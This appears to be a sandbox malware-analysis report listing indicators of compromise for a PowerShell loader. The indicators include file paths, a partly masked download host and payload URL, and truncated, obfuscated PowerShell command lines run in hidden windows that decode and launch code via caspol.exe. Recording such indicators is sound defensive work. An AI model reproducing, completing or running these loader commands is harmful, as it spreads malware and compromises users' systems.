Technical Information
- %WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe
- %APPDATA%\globatet.dat
- 'dl##ne.ro':80
- http://dl##ne.ro/Sodfarve145.prx
- DNS ASK dl##ne.ro
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Skulder = """EpiFHypuPoenDrucNattafriTiloUmanSqu DusuSupnRaaaAnncaffcBaaeImpsAxesSodiBlabFla1Win1For Tul{Per Pyr Skr Sch SacpDrvaAnarAftaJoymBer(F U[NonSKletTrarBisiOvenMaggRea]Ner`$WooFSpeuB...' (with hidden window)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe' ' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Skulder = """EpiFHypuPoenDrucNattafriTiloUmanSqu DusuSupnRaaaAnncaffcBaaeImpsAxesSodiBlabFla1Win1For Tul{Per Pyr Skr Sch SacpDrvaAnarAftaJoymBer(F U[NonSKletTrarBisiOvenMaggRea]Ner`$WooFSpeuB...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function unaccessib11 { param([String]$Futilite); $Grewsom = $Futilite.Length / 2; $Longsleeve = New-Object byte[] ($Grewsom); For($Form=0; $Form -lt $Futilite.Length; $Form+=2){ ...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe'